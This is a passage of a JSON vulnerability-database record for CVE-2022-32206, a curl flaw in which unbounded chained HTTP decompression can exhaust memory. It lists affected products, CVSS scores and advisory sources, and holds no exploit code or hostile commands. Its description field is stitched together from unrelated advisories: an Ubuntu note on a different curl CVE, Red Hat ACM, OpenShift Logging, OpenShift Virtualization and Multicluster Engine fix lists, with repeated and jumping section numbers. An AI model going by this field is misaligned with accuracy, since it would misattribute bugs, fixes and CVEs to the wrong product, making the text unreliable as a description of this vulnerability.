"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "scalance sc642-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.84.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "scalance sc632-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "scalance sc626-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "scalance sc636-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168538"
},
{
"db": "PACKETSTORM",
"id": "168275"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168347"
},
{
"db": "PACKETSTORM",
"id": "170083"
},
{
"db": "PACKETSTORM",
"id": "170166"
},
{
"db": "PACKETSTORM",
"id": "172765"
},
{
"db": "PACKETSTORM",
"id": "168284"
}
],
"trust": 0.8
},
"cve": "CVE-2022-32206",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2022-32206",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-32206",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-32206",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-32206",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202206-2565",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
},
{
"db": "NVD",
"id": "CVE-2022-32206"
},
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"description": {
"_id": null,
"data": "curl \u003c 7.84.0 supports \"chained\" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable \"links\" in this \"decompression chain\" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps. The use of such a decompression chain could result in a \"malloc bomb\", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors. Harry Sintonen discovered that curl incorrectly handled certain file permissions. \nAn attacker could possibly use this issue to expose sensitive information. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/\n\nSecurity fixes:\n\n* golang: crypto/tls: session tickets lack random ticket_age_add\n(CVE-2022-30629)\n\n* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)\n\n* nodejs16: CRLF injection in node-undici (CVE-2022-31150)\n\n* nodejs/undici: Cookie headers uncleared on cross-origin redirect\n(CVE-2022-31151)\n\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fixes:\n\n* RHACM 2.4 using deprecated APIs in managed clusters (BZ# 2041540)\n\n* vSphere network name doesn\u0027t allow entering spaces and doesn\u0027t reflect\nYAML changes (BZ# 2074766)\n\n* cluster update status is stuck, also update is not even visible (BZ#\n2079418)\n\n* Policy that creates cluster role is showing as not compliant due to\nRequest entity too large message (BZ# 2088486)\n\n* Upgraded from RHACM 2.2--\u003e2.3--\u003e2.4 and cannot create 
cluster (BZ#\n2089490)\n\n* ACM Console Becomes Unusable After a Time (BZ# 2097464)\n\n* RHACM 2.4.6 images (BZ# 2100613)\n\n* Cluster Pools with conflicting name of existing clusters in same\nnamespace fails creation and deletes existing cluster (BZ# 2102436)\n\n* ManagedClusters in Pending import state after ACM hub migration (BZ#\n2102495)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2041540 - RHACM 2.4 using deprecated APIs in managed clusters\n2074766 - vSphere network name doesn\u0027t allow entering spaces and doesn\u0027t reflect YAML changes\n2079418 - cluster update status is stuck, also update is not even visible\n2088486 - Policy that creates cluster role is showing as not compliant due to Request entity too large message\n2089490 - Upgraded from RHACM 2.2--\u003e2.3--\u003e2.4 and cannot create cluster\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2097464 - ACM Console Becomes Unusable After a Time\n2100613 - RHACM 2.4.6 images\n2102436 - Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster\n2102495 - ManagedClusters in Pending import state after ACM hub migration\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2109354 - CVE-2022-31150 nodejs16: CRLF injection in node-undici\n2121396 - CVE-2022-31151 nodejs/undici: Cookie headers uncleared on cross-origin redirect\n2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n\n5. 
JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2647 - Add link to log console from pod views\nLOG-2801 - After upgrade all logs are stored in app indices\nLOG-2917 - Changing refresh interval throws error when the \u0027Query\u0027 field is empty\n\n6. This advisory contains the following\nOpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n(CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header\n(CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions\n(CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled\noverflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect\naccess control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field\nelements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit\nX-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add\n(CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, 
acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4
.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Solution:\n\nBefore applying this update, you must apply all previously released errata\nrelevant to your system. \n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat 
checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update 
nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. 
\n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows 
VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! 
(17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, 
virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 
- crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping 
when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb 
list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 
hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. Description:\n\nMulticluster Engine for Kubernetes 2.0.2 images\n\nMulticluster engine for Kubernetes provides the foundational components\nthat are necessary for the centralized management of multiple\nKubernetes-based clusters across data centers, public clouds, and private\nclouds. \n\nYou can use the engine to create new Red Hat OpenShift Container Platform\nclusters or to bring existing Kubernetes-based clusters under management by\nimporting them. After the clusters are managed, you can use the APIs that\nare provided by the engine to distribute configuration based on placement\npolicy. \n\nSecurity updates:\n\n* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fix:\n\n* MCE 2.0.2 images (BZ# 2104569)\n\n3. Solution:\n\nFor multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2104569 - MCE 2.0.2 Images\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2\n\n5. 
\n\nBug Fix(es):\n\n* Cloning a Block DV to VM with Filesystem with not big enough size comes\nto endless loop - using pvc api (BZ#2033191)\n\n* Restart of VM Pod causes SSH keys to be regenerated within VM\n(BZ#2087177)\n\n* Import gzipped raw file causes image to be downloaded and uncompressed to\nTMPDIR (BZ#2089391)\n\n* [4.11] VM Snapshot Restore hangs indefinitely when backed by a\nsnapshotclass (BZ#2098225)\n\n* Fedora version in DataImportCrons is not \u0027latest\u0027 (BZ#2102694)\n\n* [4.11] Cloned VM\u0027s snapshot restore fails if the source VM disk is\ndeleted (BZ#2109407)\n\n* CNV introduces a compliance check fail in \"ocp4-moderate\" profile -\nroutes-protected-by-tls (BZ#2110562)\n\n* Nightly build: v4.11.0-578: index format was changed in 4.11 to\nfile-based instead of sqlite-based (BZ#2112643)\n\n* Unable to start windows VMs on PSI setups (BZ#2115371)\n\n* [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity\nrestricted:v1.24 (BZ#2128997)\n\n* Mark Windows 11 as TechPreview (BZ#2129013)\n\n* 4.11.1 rpms (BZ#2139453)\n\nThis advisory contains the following OpenShift Virtualization 4.11.1\nimages. 
